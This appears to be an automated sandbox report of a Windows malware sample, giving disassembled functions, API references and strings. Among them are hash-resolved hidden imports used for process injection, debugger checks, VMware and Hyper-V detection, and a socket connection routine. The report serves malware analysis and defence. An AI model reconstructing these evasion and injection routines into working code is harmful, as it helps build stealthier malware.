  • CloseHandle.KERNEL32, ref: 0041621C
  • CreateFileA.KERNEL32, ref: 00416288
  • SetFilePointer.KERNEL32, ref: 004162A1
Address Instruction Meta Information
00416208 push esi xrefs 004160B5
00416209 mov esi, dword ptr [esp+10h]
0041620D push edi
0041620E xor edi, edi
00416210 cmp esi, edi
00416212 je 0041624Ch
00416214 mov eax, dword ptr [esi]
00416216 cmp eax, FFFFFFFFh
00416219 je 00416222h
0041621B push eax
0041621C call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416222 or dword ptr [esi], FFFFFFFFh xrefs 00416258, 00416219
00416225 or dword ptr [esi+04h], FFFFFFFFh
00416229 push ebx
0041622A mov ebx, dword ptr [esp+14h]
0041622E mov al, byte ptr [ebx]
00416230 cmp al, 61h
00416232 mov edx, C0000000h
00416237 je 00416270h
00416239 cmp al, 72h
0041623B je 00416267h
0041623D cmp al, 77h
0041623F je 0041625Eh
00416241 push esi xrefs 00416293
00416242 call 004162ECh
00416247 pop ecx
00416248 xor eax, eax
0041624A jmp 004162ABh
0041624C push 00000008h xrefs 00416212
0041624E call 00415FF2h
00416253 mov esi, eax
00416255 cmp esi, edi
00416257 pop ecx
00416258 jne 00416222h
0041625A xor eax, eax
0041625C jmp 004162ACh
0041625E mov eax, 40000000h xrefs 0041623F
00416263 push 00000002h
00416265 jmp 00416274h
00416267 mov eax, 80000000h xrefs 0041623B
0041626C push 00000003h
0041626E jmp 00416274h
00416270 mov eax, edx xrefs 00416237
00416272 push 00000004h
00416274 cmp byte ptr [ebx+01h], 0000002Bh xrefs 0041626E, 00416265
00416278 pop ecx
00416279 jne 0041627Dh
0041627B mov eax, edx
0041627E push edi Count = 2
0041627F push ecx
00416280 push edi
00416281 push 00000003h
00416283 push eax
00416284 push dword ptr [esp+28h]
00416288 call dword ptr [00401010h] CreateFileA@KERNEL32.DLL (Import)
0041628E mov edi, eax
00416290 cmp edi, FFFFFFFFh
00416293 je 00416241h
00416295 cmp byte ptr [ebx], 00000061h
00416298 jne 004162A7h
0041629A push 00000002h
0041629E push 00000000h Count = 2
004162A0 push edi
004162A1 call dword ptr [00401014h] SetFilePointer@KERNEL32.DLL (Import)
004162A7 mov dword ptr [esi], edi xrefs 00416298
004162A9 mov eax, esi
004162AB pop ebx xrefs 0041624A
004162AC pop edi xrefs 0041625C
004162AD pop esi
004162AE ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Sleep.KERNEL32, ref: 00414196
Address Instruction Meta Information
00414180 push ebp xrefs 004153DD, 00413E24
00414181 mov ebp, esp
00414183 mov eax, dword ptr [ebp+08h]
00414186 push eax
00414187 push 6B5366BEh
0041418C push 3D9972F5h
00414191 call 00415E40h
00414196 call eax Sleep@KERNEL32.DLL (Hidden Import)
00414198 pop ebp
00414199 retn 0004h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateFileA.KERNEL32, ref: 00413FBE
Address Instruction Meta Information
00413F90 push ebp xrefs 0041473E, 00414D07, 004139CC, 00413A2D, 00413A57
00413F91 mov ebp, esp
00413F93 mov eax, dword ptr [ebp+20h]
00413F96 push eax
00413F97 mov ecx, dword ptr [ebp+1Ch]
00413F9A push ecx
00413F9B mov edx, dword ptr [ebp+18h]
00413F9E push edx
00413F9F mov eax, dword ptr [ebp+14h]
00413FA2 push eax
00413FA3 mov ecx, dword ptr [ebp+10h]
00413FA6 push ecx
00413FA7 mov edx, dword ptr [ebp+0Ch]
00413FAA push edx
00413FAB mov eax, dword ptr [ebp+08h]
00413FAE push eax
00413FAF push 6B5366BEh
00413FB4 push 08F8F114h
00413FB9 call 00415E40h
00413FBE call eax CreateFileA@KERNEL32.DLL (Import)
00413FC0 pop ebp
00413FC1 retn 001Ch function end
APIs
  • WSAStartup.WS2_32, ref: 00414BB5
  • WSASocketA.WS2_32, ref: 00414BC7
  • WSACleanup.WS2_32, ref: 00414BDC
  • gethostbyname.WS2_32, ref: 00414BEE
  • WSACleanup.WS2_32, ref: 00414C03
  • htons.WS2_32, ref: 00414C10
  • inet_ntoa.WS2_32, ref: 00414C37
  • inet_addr.WS2_32, ref: 00414C3E
  • WSAConnect.WS2_32, ref: 00414C62
  • WSACleanup.WS2_32, ref: 00414C6D
Address Instruction Meta Information
00414BA0 push ebp xrefs 00414DF0
00414BA1 mov ebp, esp
00414BA3 sub esp, 000001A8h
00414BA9 lea eax, dword ptr [ebp-00000190h]
00414BAF push eax
00414BB0 push 00000202h
00414BB5 call dword ptr [00401048h] WSAStartup@WS2_32.DLL (Import)
00414BBF push 00000000h Count = 3
00414BC1 push 00000006h
00414BC3 push 00000001h
00414BC5 push 00000002h
00414BC7 call dword ptr [00401068h] WSASocketA@WS2_32.DLL (Import)
00414BCD mov dword ptr [ebp-00000194h], eax
00414BD3 cmp dword ptr [ebp-00000194h], FFFFFFFFh
00414BDA jne 00414BEAh
00414BDC call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414BE2 or eax, FFFFFFFFh
00414BE5 jmp 00414C7Eh
00414BEA mov ecx, dword ptr [ebp+08h] xrefs 00414BDA
00414BED push ecx
00414BEE call dword ptr [00401060h] gethostbyname@WS2_32.DLL (Import)
00414BF4 mov dword ptr [ebp-00000198h], eax
00414BFA cmp dword ptr [ebp-00000198h], 00000000h
00414C01 jne 00414C0Eh
00414C03 call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414C09 or eax, FFFFFFFFh
00414C0C jmp 00414C7Eh
00414C0E push 00000050h xrefs 00414C01
00414C10 call dword ptr [00401054h] htons@WS2_32.DLL (Import)
00414C16 mov word ptr [ebp-000001A6h], ax
00414C1D mov edx, 00000002h
00414C22 mov word ptr [ebp-000001A8h], dx
00414C29 mov eax, dword ptr [ebp-00000198h]
00414C2F mov ecx, dword ptr [eax+0Ch]
00414C32 mov edx, dword ptr [ecx]
00414C34 mov eax, dword ptr [edx]
00414C36 push eax
00414C37 call dword ptr [00401044h] inet_ntoa@WS2_32.DLL (Import)
00414C3D push eax
00414C3E call dword ptr [0040104Ch] inet_addr@WS2_32.DLL (Import)
00414C44 mov dword ptr [ebp-000001A4h], eax
00414C50 push 00000000h Count = 4
00414C52 push 00000010h
00414C54 lea ecx, dword ptr [ebp-000001A8h]
00414C5A push ecx
00414C5B mov edx, dword ptr [ebp-00000194h]
00414C61 push edx
00414C62 call dword ptr [00401050h] WSAConnect@WS2_32.DLL (Import)
00414C68 cmp eax, FFFFFFFFh
00414C6B jne 00414C78h
00414C6D call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414C73 or eax, FFFFFFFFh
00414C76 jmp 00414C7Eh
00414C78 mov eax, dword ptr [ebp-00000194h] xrefs 00414C6B
00414C7E mov esp, ebp xrefs 00414C76, 00414C0C, 00414BE5
00414C80 pop ebp
00414C81 ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • SetThreadContext.KERNEL32, ref: 0041456A
Address Instruction Meta Information
00414550 push ebp xrefs 00414407
00414551 mov ebp, esp
00414553 mov eax, dword ptr [ebp+0Ch]
00414556 push eax
00414557 mov ecx, dword ptr [ebp+08h]
0041455A push ecx
0041455B push 6B5366BEh
00414560 push AA1DC82Fh
00414565 call 00415E40h
0041456A call eax SetThreadContext@KERNEL32.DLL (Hidden Import)
0041456C pop ebp
0041456D retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • SetCurrentDirectoryA.KERNEL32, ref: 00414126
Address Instruction Meta Information
00414110 push ebp xrefs 00413F16, 00413DA6, 00413DBA
00414111 mov ebp, esp
00414113 mov eax, dword ptr [ebp+08h]
00414116 push eax
00414117 push 6B5366BEh
0041411C push C807174Eh
00414121 call 00415E40h
00414126 call eax SetCurrentDirectoryA@KERNEL32.DLL (Hidden Import)
00414128 pop ebp
00414129 retn 0004h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • MoveFileExA.KERNEL32, ref: 00414A1E
Address Instruction Meta Information
00414A00 push ebp xrefs 0041461B
00414A01 mov ebp, esp
00414A03 mov eax, dword ptr [ebp+10h]
00414A06 push eax
00414A07 mov ecx, dword ptr [ebp+0Ch]
00414A0A push ecx
00414A0B mov edx, dword ptr [ebp+08h]
00414A0E push edx
00414A0F push 6B5366BEh
00414A14 push 3A7A7478h
00414A19 call 00415E40h
00414A1E call eax MoveFileExA@KERNEL32.DLL (Hidden Import)
00414A20 pop ebp
00414A21 retn 000Ch function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CheckRemoteDebuggerPresent.KERNEL32, ref: 0041226A
Address Instruction Meta Information
00412250 push ebp xrefs 004121A3
00412251 mov ebp, esp
00412253 mov eax, dword ptr [ebp+0Ch]
00412256 push eax
00412257 mov ecx, dword ptr [ebp+08h]
0041225A push ecx
0041225B push 6B5366BEh
00412260 push 6D3A8272h
00412265 call 00415E40h
0041226A call eax CheckRemoteDebuggerPresent@KERNEL32.DLL (Hidden Import)
0041226C pop ebp
0041226D retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • VirtualAllocEx.KERNEL32, ref: 00414516
Address Instruction Meta Information
004144F0 push ebp xrefs 00414329, 004151A5
004144F1 mov ebp, esp
004144F3 mov eax, dword ptr [ebp+18h]
004144F6 push eax
004144F7 mov ecx, dword ptr [ebp+14h]
004144FA push ecx
004144FB mov edx, dword ptr [ebp+10h]
004144FE push edx
004144FF mov eax, dword ptr [ebp+0Ch]
00414502 push eax
00414503 mov ecx, dword ptr [ebp+08h]
00414506 push ecx
00414507 push 6B5366BEh
0041450C push 9ABFB8A6h
00414511 call 00415E40h
00414516 call eax VirtualAllocEx@KERNEL32.DLL (Hidden Import)
00414518 pop ebp
00414519 retn 0014h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • ResumeThread.KERNEL32, ref: 00414586
Address Instruction Meta Information
00414570 push ebp xrefs 00414410
00414571 mov ebp, esp
00414573 mov eax, dword ptr [ebp+08h]
00414576 push eax
00414577 push 6B5366BEh
0041457C push 7B88BF3Bh
00414581 call 00415E40h
00414586 call eax ResumeThread@KERNEL32.DLL (Hidden Import)
00414588 pop ebp
00414589 retn 0004h function end
APIs
  • InternetGetConnectedState.WININET, ref: 00414B8A
Address Instruction Meta Information
00414B80 push ebp xrefs 0041493D
00414B81 mov ebp, esp
00414B83 push ecx
00414B84 push 00000000h
00414B86 lea eax, dword ptr [ebp-04h]
00414B89 push eax
00414B8A call dword ptr [0040103Ch] InternetGetConnectedState@WININET.DLL (Import)
00414B90 neg eax
00414B92 sbb eax, eax
00414B94 neg eax
00414B96 mov esp, ebp
00414B98 pop ebp
00414B99 ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateToolhelp32Snapshot.KERNEL32, ref: 004136BA
Address Instruction Meta Information
004136A0 push ebp xrefs 004133A7
004136A1 mov ebp, esp
004136A3 mov eax, dword ptr [ebp+0Ch]
004136A6 push eax
004136A7 mov ecx, dword ptr [ebp+08h]
004136AA push ecx
004136AB push 6B5366BEh
004136B0 push 5BC1D14Fh
004136B5 call 00415E40h
004136BA call eax CreateToolhelp32Snapshot@KERNEL32.DLL (Hidden Import)
004136BC pop ebp
004136BD retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegQueryValueExA.ADVAPI32, ref: 004137DA
Address Instruction Meta Information
004137B0 push ebp xrefs 004135C1
004137B1 mov ebp, esp
004137B3 mov eax, dword ptr [ebp+1Ch]
004137B6 push eax
004137B7 mov ecx, dword ptr [ebp+18h]
004137BA push ecx
004137BB mov edx, dword ptr [ebp+14h]
004137BE push edx
004137BF mov eax, dword ptr [ebp+10h]
004137C2 push eax
004137C3 mov ecx, dword ptr [ebp+0Ch]
004137C6 push ecx
004137C7 mov edx, dword ptr [ebp+08h]
004137CA push edx
004137CB push 647832FCh
004137D0 push 1802E7C8h
004137D5 call 00415E40h
004137DA call eax RegQueryValueExA@ADVAPI32.DLL (Hidden Import)
004137DC pop ebp
004137DD retn 0018h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CopyFileA.KERNEL32, ref: 004156FE
Address Instruction Meta Information
004156E0 push ebp xrefs 004156BA, 004155F3, 00415631, 004154B0, 004154EB
004156E1 mov ebp, esp
004156E3 mov eax, dword ptr [ebp+10h]
004156E6 push eax
004156E7 mov ecx, dword ptr [ebp+0Ch]
004156EA push ecx
004156EB mov edx, dword ptr [ebp+08h]
004156EE push edx
004156EF push 6B5366BEh
004156F4 push 2EE4F10Dh
004156F9 call 00415E40h
004156FE call eax CopyFileA@KERNEL32.DLL (Hidden Import)
00415700 pop ebp
00415701 retn 000Ch function end
Non-executed Functions
Strings
  • vmwareuser.exe, va: 00411E44
  • vmwaretray.exe, va: 00411E54
  • SYSTEM\ControlSet001\Services, va: 00411E64
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, va: 00411E88
  • vmdebug, va: 00411ED8
  • vmmouse, va: 00411EE0
  • VMTools, va: 00411EE8
  • VMMEMCTL, va: 00411EF0
  • vmware, va: 00411EFC
  • Identifier, va: 00411F04
Address Instruction Meta Information
00412540 push ebp xrefs 004147FA
00412541 mov ebp, esp
00412543 sub esp, 0000029Ch
00412549 push esi
0041254A push edi
0041254B mov eax, dword ptr [00411E44h] ASCII "vmwareuser.exe"
00412550 mov dword ptr [ebp-00000294h], eax
00412556 mov ecx, dword ptr [00411E48h] 73756572
0041255C mov dword ptr [ebp-00000290h], ecx
00412562 mov edx, dword ptr [00411E4Ch] 652E7265
00412568 mov dword ptr [ebp-0000028Ch], edx
0041256E mov ax, word ptr [00411E50h] 6578
00412574 mov word ptr [ebp-00000288h], ax
0041257B mov cl, byte ptr [00411E52h] 00
00412581 mov byte ptr [ebp-00000286h], cl
00412587 xor edx, edx
00412589 mov dword ptr [ebp-00000285h], edx
0041258F mov byte ptr [ebp-00000281h], dl
00412595 mov eax, dword ptr [00411E54h] ASCII "vmwaretray.exe"
0041259A mov dword ptr [ebp-00000280h], eax
004125A0 mov ecx, dword ptr [00411E58h] 72746572
004125A6 mov dword ptr [ebp-0000027Ch], ecx
004125AC mov edx, dword ptr [00411E5Ch] 652E7961
004125B2 mov dword ptr [ebp-00000278h], edx
004125B8 mov ax, word ptr [00411E60h] 6578
004125BE mov word ptr [ebp-00000274h], ax
004125C5 mov cl, byte ptr [00411E62h] 00
004125CB mov byte ptr [ebp-00000272h], cl
004125D1 xor edx, edx
004125D3 mov dword ptr [ebp-00000271h], edx
004125D9 mov byte ptr [ebp-0000026Dh], dl
004125DF xor eax, eax
004125E1 mov word ptr [ebp-04h], ax
004125E5 jmp 004125F3h
004125E7 mov cx, word ptr [ebp-04h] xrefs 00412621
004125EB add cx, 0001h
004125EF mov word ptr [ebp-04h], cx
004125F3 movzx edx, word ptr [ebp-04h] xrefs 004125E5
004125F7 cmp edx, 02h
004125FA jnl 00412623h
004125FC movzx eax, word ptr [ebp-04h]
00412600 imul eax, eax, 14h
00412603 lea ecx, dword ptr [ebp+eax-00000294h]
0041260A push ecx
0041260B call 00413380h
00412610 add esp, 04h
00412613 movzx edx, al
00412616 test edx, edx
00412618 je 00412621h
0041261A mov al, 01h
0041261C jmp 004127D4h
00412621 jmp 004125E7h xrefs 00412618
00412623 mov ecx, 00000007h xrefs 004125FA
00412628 mov esi, 00411E64h ASCII "SYSTEM\ControlSet001\Services"
0041262D lea edi, dword ptr [ebp-00000260h]
00412633 rep movsd
00412635 movsw
00412637 push 00000046h
00412639 push 00000000h
0041263B lea eax, dword ptr [ebp-00000242h]
00412641 push eax
00412642 call 00415F8Fh
00412647 add esp, 0Ch
0041264A mov ecx, 00000013h
0041264F mov esi, 00411E88h ASCII "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
00412654 lea edi, dword ptr [ebp-000001FCh]
0041265A rep movsd
0041265C movsb
0041265D xor ecx, ecx
0041265F mov dword ptr [ebp-000001AFh], ecx
00412665 mov dword ptr [ebp-000001ABh], ecx
0041266B mov dword ptr [ebp-000001A7h], ecx
00412671 mov dword ptr [ebp-000001A3h], ecx
00412677 mov dword ptr [ebp-0000019Fh], ecx
0041267D mov word ptr [ebp-0000019Bh], cx
00412684 mov byte ptr [ebp-00000199h], cl
0041268A mov edx, dword ptr [00411ED8h] ASCII "vmdebug"
00412690 mov dword ptr [ebp-00000198h], edx
00412696 mov eax, dword ptr [00411EDCh] 00677562
0041269B mov dword ptr [ebp-00000194h], eax
004126A1 push 0000005Ch
004126A3 push 00000000h
004126A5 lea ecx, dword ptr [ebp-00000190h]
004126AB push ecx
004126AC call 00415F8Fh
004126B1 add esp, 0Ch
004126B4 mov edx, dword ptr [00411EE0h] ASCII "vmmouse"
004126BA mov dword ptr [ebp-00000134h], edx
004126C0 mov eax, dword ptr [00411EE4h] 00657375
004126C5 mov dword ptr [ebp-00000130h], eax
004126CB push 0000005Ch
004126CD push 00000000h
004126CF lea ecx, dword ptr [ebp-0000012Ch]
004126D5 push ecx
004126D6 call 00415F8Fh
004126DB add esp, 0Ch
004126DE mov edx, dword ptr [00411EE8h] ASCII "VMTools"
004126E4 mov dword ptr [ebp-000000D0h], edx
004126EA mov eax, dword ptr [00411EECh] 00736C6F
004126EF mov dword ptr [ebp-000000CCh], eax
004126F5 push 0000005Ch
004126F7 push 00000000h
004126F9 lea ecx, dword ptr [ebp-000000C8h]
004126FF push ecx
00412700 call 00415F8Fh
00412705 add esp, 0Ch
00412708 mov edx, dword ptr [00411EF0h] ASCII "VMMEMCTL"
0041270E mov dword ptr [ebp-6Ch], edx
00412711 mov eax, dword ptr [00411EF4h] 4C54434D
00412716 mov dword ptr [ebp-68h], eax
00412719 mov cl, byte ptr [00411EF8h] 00
0041271F mov byte ptr [ebp-64h], cl
00412722 push 0000005Bh
00412724 push 00000000h
00412726 lea edx, dword ptr [ebp-63h]
00412729 push edx
0041272A call 00415F8Fh
0041272F add esp, 0Ch
00412732 push 00000004h
00412734 lea eax, dword ptr [ebp-00000198h]
0041273A push eax
0041273B lea ecx, dword ptr [ebp-00000260h]
00412741 push ecx
00412742 call 00413450h
00412747 add esp, 0Ch
0041274A movzx edx, al
0041274D test edx, edx
0041274F je 00412755h
00412751 mov al, 01h
00412753 jmp 004127D4h
00412755 mov eax, dword ptr [00411EFCh] ASCII "vmware" xrefs 0041274F
0041275A mov dword ptr [ebp-0000029Ch], eax
00412760 mov cx, word ptr [00411F00h] 6572
00412767 mov word ptr [ebp-00000298h], cx
0041276E mov dl, byte ptr [00411F02h] 00
00412774 mov byte ptr [ebp-00000296h], dl
0041277A mov eax, dword ptr [00411F04h] ASCII "Identifier"
0041277F mov dword ptr [ebp-0000026Ch], eax
00412785 mov ecx, dword ptr [00411F08h] 69666974
0041278B mov dword ptr [ebp-00000268h], ecx
00412791 mov dx, word ptr [00411F0Ch] 7265
00412798 mov word ptr [ebp-00000264h], dx
0041279F mov al, byte ptr [00411F0Eh] 00
004127A4 mov byte ptr [ebp-00000262h], al
004127AA lea ecx, dword ptr [ebp-0000029Ch]
004127B0 push ecx
004127B1 lea edx, dword ptr [ebp-0000026Ch]
004127B7 push edx
004127B8 lea eax, dword ptr [ebp-000001FCh]
004127BE push eax
004127BF call 00413560h
004127C4 add esp, 0Ch
004127C7 movzx ecx, al
004127CA test ecx, ecx
004127CC je 004127D2h
004127CE mov al, 01h
004127D0 jmp 004127D4h
004127D2 xor al, al xrefs 004127CC
004127D4 pop edi xrefs 004127D0, 00412753, 0041261C
004127D5 pop esi
004127D6 mov esp, ebp
004127D8 pop ebp
004127D9 ret function end
Strings
  • SOFTWARE\Microsoft, va: 00411DC0
  • SYSTEM\ControlSet001\Services, va: 00411DD4
  • Hyper-V, va: 00411DF4
  • VirtualMachine, va: 00411DFC
  • vmicheartbeat, va: 00411E0C
  • vmicvss, va: 00411E1C
  • vmicshutdown, va: 00411E24
  • vmicexchange, va: 00411E34
Address Instruction Meta Information
004122B0 push ebp xrefs 004147EE
004122B1 mov ebp, esp
004122B3 sub esp, 000003F0h
004122B9 push esi
004122BA push edi
004122BB mov eax, dword ptr [00411DC0h] ASCII "SOFTWARE\Microsoft"
004122C0 mov dword ptr [ebp-000003F0h], eax
004122C6 mov ecx, dword ptr [00411DC4h] 45524157
004122CC mov dword ptr [ebp-000003ECh], ecx
004122D2 mov edx, dword ptr [00411DC8h] 63694D5C
004122D8 mov dword ptr [ebp-000003E8h], edx
004122DE mov eax, dword ptr [00411DCCh] 6F736F72
004122E3 mov dword ptr [ebp-000003E4h], eax
004122E9 mov cx, word ptr [00411DD0h] 7466
004122F0 mov word ptr [ebp-000003E0h], cx
004122F7 mov dl, byte ptr [00411DD2h] 00
004122FD mov byte ptr [ebp-000003DEh], dl
00412303 push 00000051h
00412305 push 00000000h
00412307 lea eax, dword ptr [ebp-000003DDh]
0041230D push eax
0041230E call 00415F8Fh
00412313 add esp, 0Ch
00412316 mov ecx, 00000007h
0041231B mov esi, 00411DD4h ASCII "SYSTEM\ControlSet001\Services"
00412320 lea edi, dword ptr [ebp-0000038Ch]
00412326 rep movsd
00412328 movsw
0041232A push 00000046h
0041232C push 00000000h
0041232E lea ecx, dword ptr [ebp-0000036Eh]
00412334 push ecx
00412335 call 00415F8Fh
0041233A add esp, 0Ch
0041233D mov edx, dword ptr [00411DF4h] ASCII "Hyper-V"
00412343 mov dword ptr [ebp-00000328h], edx
00412349 mov eax, dword ptr [00411DF8h] 00562D72
0041234E mov dword ptr [ebp-00000324h], eax
00412354 push 0000005Ch
00412356 push 00000000h
00412358 lea ecx, dword ptr [ebp-00000320h]
0041235E push ecx
0041235F call 00415F8Fh
00412364 add esp, 0Ch
00412367 mov edx, dword ptr [00411DFCh] ASCII "VirtualMachine"
0041236D mov dword ptr [ebp-000002C4h], edx
00412373 mov eax, dword ptr [00411E00h] 4D6C6175
00412378 mov dword ptr [ebp-000002C0h], eax
0041237E mov ecx, dword ptr [00411E04h] 69686361
00412384 mov dword ptr [ebp-000002BCh], ecx
0041238A mov dx, word ptr [00411E08h] 656E
00412391 mov word ptr [ebp-000002B8h], dx
00412398 mov al, byte ptr [00411E0Ah] 00
0041239D mov byte ptr [ebp-000002B6h], al
004123A3 push 00000055h
004123A5 push 00000000h
004123A7 lea ecx, dword ptr [ebp-000002B5h]
004123AD push ecx
004123AE call 00415F8Fh
004123B3 add esp, 0Ch
004123B6 mov dl, byte ptr [0041198Bh] 00
004123BC mov byte ptr [ebp-00000260h], dl
004123C2 push 00000063h
004123C4 push 00000000h
004123C6 lea eax, dword ptr [ebp-0000025Fh]
004123CC push eax
004123CD call 00415F8Fh
004123D2 add esp, 0Ch
004123D5 mov cl, byte ptr [0041198Fh] 5A
004123DB mov byte ptr [ebp-000001FCh], cl
004123E1 push 00000063h
004123E3 push 00000000h
004123E5 lea edx, dword ptr [ebp-000001FBh]
004123EB push edx
004123EC call 00415F8Fh
004123F1 add esp, 0Ch
004123F4 mov eax, dword ptr [00411E0Ch] ASCII "vmicheartbeat"
004123F9 mov dword ptr [ebp-00000198h], eax
004123FF mov ecx, dword ptr [00411E10h] 72616568
00412405 mov dword ptr [ebp-00000194h], ecx
0041240B mov edx, dword ptr [00411E14h] 61656274
00412411 mov dword ptr [ebp-00000190h], edx
00412417 mov ax, word ptr [00411E18h] 0074
0041241D mov word ptr [ebp-0000018Ch], ax
00412424 push 00000056h
00412426 push 00000000h
00412428 lea ecx, dword ptr [ebp-0000018Ah]
0041242E push ecx
0041242F call 00415F8Fh
00412434 add esp, 0Ch
00412437 mov edx, dword ptr [00411E1Ch] ASCII "vmicvss"
0041243D mov dword ptr [ebp-00000134h], edx
00412443 mov eax, dword ptr [00411E20h] 00737376
00412448 mov dword ptr [ebp-00000130h], eax
0041244E push 0000005Ch
00412450 push 00000000h
00412452 lea ecx, dword ptr [ebp-0000012Ch]
00412458 push ecx
00412459 call 00415F8Fh
0041245E add esp, 0Ch
00412461 mov edx, dword ptr [00411E24h] ASCII "vmicshutdown"
00412467 mov dword ptr [ebp-000000D0h], edx
0041246D mov eax, dword ptr [00411E28h] 74756873
00412472 mov dword ptr [ebp-000000CCh], eax
00412478 mov ecx, dword ptr [00411E2Ch] 6E776F64
0041247E mov dword ptr [ebp-000000C8h], ecx
00412484 mov dl, byte ptr [00411E30h] 00
0041248A mov byte ptr [ebp-000000C4h], dl
00412490 push 00000057h
00412492 push 00000000h
00412494 lea eax, dword ptr [ebp-000000C3h]
0041249A push eax
0041249B call 00415F8Fh
004124A0 add esp, 0Ch
004124A3 mov ecx, dword ptr [00411E34h] ASCII "vmicexchange"
004124A9 mov dword ptr [ebp-6Ch], ecx
004124AC mov edx, dword ptr [00411E38h] 68637865
004124B2 mov dword ptr [ebp-68h], edx
004124B5 mov eax, dword ptr [00411E3Ch] 65676E61
004124BA mov dword ptr [ebp-64h], eax
004124BD mov cl, byte ptr [00411E40h] 00
004124C3 mov byte ptr [ebp-60h], cl
004124C6 push 00000057h
004124C8 push 00000000h
004124CA lea edx, dword ptr [ebp-5Fh]
004124CD push edx
004124CE call 00415F8Fh
004124D3 add esp, 0Ch
004124D6 xor eax, eax
004124D8 mov word ptr [ebp-04h], ax
004124DC jmp 004124EAh
004124DE mov cx, word ptr [ebp-04h] xrefs 00412529
004124E2 add cx, 0001h
004124E6 mov word ptr [ebp-04h], cx
004124EA movzx edx, word ptr [ebp-04h] xrefs 004124DC
004124EE cmp edx, 02h
004124F1 jnl 0041252Bh
004124F3 push 00000004h
004124F5 movzx eax, word ptr [ebp-04h]
004124F9 imul eax, eax, 00000190h
004124FF lea ecx, dword ptr [ebp+eax-00000328h]
00412506 push ecx
00412507 movzx edx, word ptr [ebp-04h]
0041250B imul edx, edx, 64h
0041250E lea eax, dword ptr [ebp+edx-000003F0h]
00412515 push eax
00412516 call 00413450h
0041251B add esp, 0Ch
0041251E movzx ecx, al
00412521 test ecx, ecx
00412523 je 00412529h
00412525 mov al, 01h
00412527 jmp 0041252Dh
00412529 jmp 004124DEh xrefs 00412523
0041252B xor al, al xrefs 004124F1
0041252D pop edi xrefs 00412527
0041252E pop esi
0041252F mov esp, ebp
00412531 pop ebp
00412532 ret function end
Address Instruction Meta Information
00413380 push ebp xrefs 0041260B, 0041288D, 00412F0F, 00412F7E
00413381 mov ebp, esp
00413383 sub esp, 00000198h
00413389 mov dword ptr [ebp-00000178h], 00000128h
00413393 mov eax, dword ptr [ebp+08h]
00413396 push eax
00413397 call 00415EDCh
0041339C add esp, 04h
0041339F mov word ptr [ebp-08h], ax
004133A3 push 00000000h
004133A5 push 00000002h
004133A7 call 004136A0h
004133AC mov dword ptr [ebp-04h], eax
004133AF mov cl, byte ptr [00411987h] 00
004133B5 mov byte ptr [ebp-70h], cl
004133B8 push 00000063h
004133BA push 00000000h
004133BC lea edx, dword ptr [ebp-6Fh]
004133BF push edx
004133C0 call 00415F8Fh
004133C5 add esp, 0Ch
004133C8 mov eax, dword ptr [ebp+08h]
004133CB push eax
004133CC call 00413330h
004133D1 add esp, 04h
004133D4 lea ecx, dword ptr [ebp-00000198h]
004133DA push ecx
004133DB mov edx, dword ptr [ebp-04h]
004133DE push edx
004133DF call 004136C0h
004133E4 test eax, eax
004133E6 je 0041343Eh
004133E8 lea eax, dword ptr [ebp-00000198h] xrefs 0041343C
004133EE push eax
004133EF mov ecx, dword ptr [ebp-04h]
004133F2 push ecx
004133F3 call 004136E0h
004133F8 test eax, eax
004133FA je 0041343Eh
004133FC lea edx, dword ptr [ebp-00000174h]
00413402 push edx
00413403 lea eax, dword ptr [ebp-70h]
00413406 push eax
00413407 call 00415EECh
0041340C add esp, 08h
0041340F mov byte ptr [ebp-0Dh], 00000000h
00413413 lea ecx, dword ptr [ebp-70h]
00413416 push ecx
00413417 call 00413330h
0041341C add esp, 04h
0041341F movzx edx, word ptr [ebp-08h]
00413423 push edx
00413424 lea eax, dword ptr [ebp-70h]
00413427 push eax
00413428 mov ecx, dword ptr [ebp+08h]
0041342B push ecx
0041342C call 00415EABh
00413431 add esp, 0Ch
00413434 test eax, eax
00413436 jne 0041343Ch
00413438 mov al, 01h
0041343A jmp 00413449h
0041343C jmp 004133E8h xrefs 00413436
0041343E mov edx, dword ptr [ebp-04h] xrefs 004133E6, 004133FA
00413441 push edx
00413442 call 00413700h
00413447 xor al, al
00413449 mov esp, ebp xrefs 0041343A
0041344B pop ebp
0041344C ret function end
Address Instruction Meta Information
00413560 push ebp xrefs 004127BF, 00412ECE
00413561 mov ebp, esp
00413563 sub esp, 00000408h
00413569 mov dword ptr [ebp-00000204h], 000001F4h
00413573 mov dword ptr [ebp-00000404h], 00000001h
0041357D mov dword ptr [ebp-08h], 00000000h
00413584 lea eax, dword ptr [ebp-04h]
00413587 push eax
00413588 push 00000001h
0041358A push 00000000h
0041358C mov ecx, dword ptr [ebp+08h]
0041358F push ecx
00413590 push 80000002h
00413595 call 00413720h
0041359A test eax, eax
0041359C jne 0041368Dh
004135A2 lea edx, dword ptr [ebp-00000204h]
004135A8 push edx
004135A9 lea eax, dword ptr [ebp-00000200h]
004135AF push eax
004135B0 lea ecx, dword ptr [ebp-00000404h]
004135B6 push ecx
004135B7 push 00000000h
004135B9 mov edx, dword ptr [ebp+0Ch]
004135BC push edx
004135BD mov eax, dword ptr [ebp-04h]
004135C0 push eax
004135C1 call 004137B0h
004135C6 mov dword ptr [ebp-00000408h], eax
004135CC cmp dword ptr [ebp-00000408h], 00000000h
004135D3 jne 00413680h
004135D9 mov ecx, dword ptr [ebp-04h]
004135DC push ecx
004135DD call 00413790h
004135E2 lea edx, dword ptr [ebp-00000200h]
004135E8 push edx
